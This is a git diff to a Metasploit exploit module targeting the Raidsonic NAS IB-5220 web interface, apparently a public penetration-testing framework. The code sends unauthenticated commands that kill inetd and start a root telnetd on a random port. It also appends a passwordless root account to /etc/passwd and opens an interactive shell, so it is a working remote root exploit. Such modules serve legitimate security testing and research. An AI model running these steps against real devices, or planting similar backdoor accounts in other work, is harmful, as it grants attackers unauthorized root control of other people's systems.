diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
index f8f37a24fa..5c4c24dd8c 100644
--- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
+++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
@@ -41,63 +41,57 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'Feb 04 2013',
 			'Privileged'     => true,
 			'Platform'       => ['linux','unix'],
-			'Payload'        =>
+			'Payload'     =>
 				{
-					'DisableNops' => true,
+					'Compat'  => {
+						'PayloadType'    => 'cmd_interact',
+						'ConnectionType' => 'find',
+					},
 				},
+			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
 			'Targets'        =>
 				[
-					[ 'CMD',	#all devices
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
-					[ 'Telnet',	#all devices - default target
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
+					[ 'Automatic',	{ } ],
 				],
-			'DefaultTarget'  => 1
+			'DefaultTarget'  => 0
 			))
+
+		register_options(
+			[
+				OptString.new('USERNAME',[ true, 'User to login with', 'admin']),
+				OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']),
+
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+			], self.class)
+	end
+
+	def tel_timeout
+		(datastore['TelnetTimeout'] || 10).to_i
+	end
+
+	def banner_timeout
+		(datastore['TelnetBannerTimeout'] || 25).to_i
 	end
 
 	def exploit
 		@response_pattern = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
-		if target.name =~ /CMD/
-			exploit_cmd
-		else
-			exploit_telnet
-		end
-	end
-
-	def exploit_cmd
-		if not (datastore['CMD'])
-			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-		end
-		print_status("#{rhost}:#{rport} - Sending remote command")
-		res = request(payload.encoded)
-
-		if (!res or res.code != 200 or res.body !~ /#{@response_pattern}/)
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
-
-		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
-
-		return
+		exploit_telnet
 	end
 
 	def exploit_telnet
 		telnetport = rand(65535)
 
-		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+		print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 		#first request
 		cmd = "killall inetd"
 		cmd = Rex::Text.uri_encode(cmd)
-		vprint_status("#{rhost}:#{rport} - sending first request - killing inetd")
+		print_status("#{rhost}:#{rport} - sending first request - killing inetd")
 
 		res = request(cmd)
 		#no server header or something that we could use to get sure the command is executed
@@ -109,7 +103,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		inetd_cfg = rand_text_alpha(8)
 		cmd = "echo \"#{telnetport} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
 		cmd = Rex::Text.uri_encode(cmd)
-		vprint_status("#{rhost}:#{rport} - sending second request - configure inetd")
+		print_status("#{rhost}:#{rport} - sending second request - configure inetd")
+		register_file_for_cleanup("/tmp/#{inetd_cfg}")
 
 		res = request(cmd)
 		#no server header or something that we could use to get sure the command is executed
@@ -120,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#third request
 		cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
 		cmd = Rex::Text.uri_encode(cmd)
-		vprint_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
+		print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
 
 		res = request(cmd)
 		#no server header or something that we could use to get sure the command is executed
@@ -132,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		user = rand_text_alpha(6)
 		cmd = "echo \"#{user}::0:0:/:/bin/ash\" >> /etc/passwd"
 		cmd = Rex::Text.uri_encode(cmd)
-		vprint_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}")
+		print_status("#{rhost}:#{rport} - sending fourth request - configure user #{user}")
 
 		res = request(cmd)
 		#no server header or something that we could use to get sure the command is executed
@@ -140,12 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end
 		begin
+			print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
 			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-			if sock
-				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				add_socket(sock)
-			else
+			if sock.nil?
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
 
@@ -160,18 +153,17 @@ class Metasploit3 < Msf::Exploit::Remote
 				:active => true
 			}
 			report_auth_info(auth_info)
-			merge_me = {
-				'USERPASS_FILE' => nil,
-				'USER_FILE'     => nil,
-				'PASS_FILE'     => nil,
-				'USERNAME'      => user,
-				'PASSWORD'      => nil
-			}
+			prompt = negotiate_telnet(sock)
+			if prompt.nil?
+				sock.close
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+			else
+				print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+			end
+
 			sock.put(user)
 			sock.put("\r\n")
-			sock.put("rm /tmp/#{inetd_cfg}")
-			sock.put("\r\n")
-			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+			handler(sock)
 		rescue
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 		end
@@ -206,7 +198,22 @@ class Metasploit3 < Msf::Exploit::Remote
 				})
 			return res
 		rescue ::Rex::ConnectionError
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") 
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+		end
+	end
+	def negotiate_telnet(sock)
+		begin
+			Timeout.timeout(banner_timeout) do
+				while(true)
+					data = sock.get_once(-1, tel_timeout)
+					return nil if not data or data.length == 0
+					if data =~ /login/
+						return true
+					end
+				end
+			end
+		rescue ::Timeout::Error
+			return nil
 		end
 	end
 end